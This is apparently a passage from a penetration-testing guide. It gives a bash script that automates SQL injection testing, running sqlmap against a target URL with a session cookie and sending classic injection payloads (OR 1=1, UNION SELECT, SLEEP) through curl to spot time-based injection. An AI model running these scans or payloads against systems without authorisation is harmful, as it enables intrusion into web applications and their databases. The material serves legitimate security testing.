Automated Security Scanning Tools

Automated tools accelerate testing and ensure comprehensive coverage:
#!/bin/bash
# Automated SQL injection testing script

# Function to test with sqlmap
test_with_sqlmap() {
    local target_url=$1
    local cookie=$2
    local output_dir="sqlmap_results_$(date +%Y%m%d_%H%M%S)"
    
    echo "[*] Starting sqlmap scan on $target_url"
    
    # Basic scan
    sqlmap -u "$target_url" \
           --cookie="$cookie" \
           --batch \
           --random-agent \
           --level=2 \
           --risk=2 \
           --output-dir="$output_dir" \
           --threads=5
    
    # Test specific parameters
    sqlmap -u "$target_url" \
           --cookie="$cookie" \
           --batch \
           --param-filter="id,user,search,filter" \
           --technique=BEUSTQ \
           --dbms=MySQL,PostgreSQL,MSSQL \
           --output-dir="$output_dir"
    
    # Generate report
    echo "[*] Scan complete. Results in $output_dir"
}

# Function to test with custom payloads
test_with_custom_payloads() {
    local base_url=$1
    local param=$2
    
    payloads=(
        "'"
        "'--"
        "' OR '1'='1"
        "' UNION SELECT NULL--"
        "' AND SLEEP(5)--"
    )
    
    for payload in "${payloads[@]}"; do
        encoded_payload=$(python3 -c "import urllib.parse; print(urllib.parse.quote('''$payload'''))")
        url="${base_url}?${param}=${encoded_payload}"
        
        response_time=$(curl -w "%{time_total}" -o /dev/null -s "$url")
        echo "[*] Testing payload: $payload - Response time: $response_time"
        
        # Check for delays (potential time-based injection)
        if (( $(echo "$response_time > 4.5" | bc -l) )); then
            echo "[!] Possible time-based SQL injection detected!"
        fi
    done
}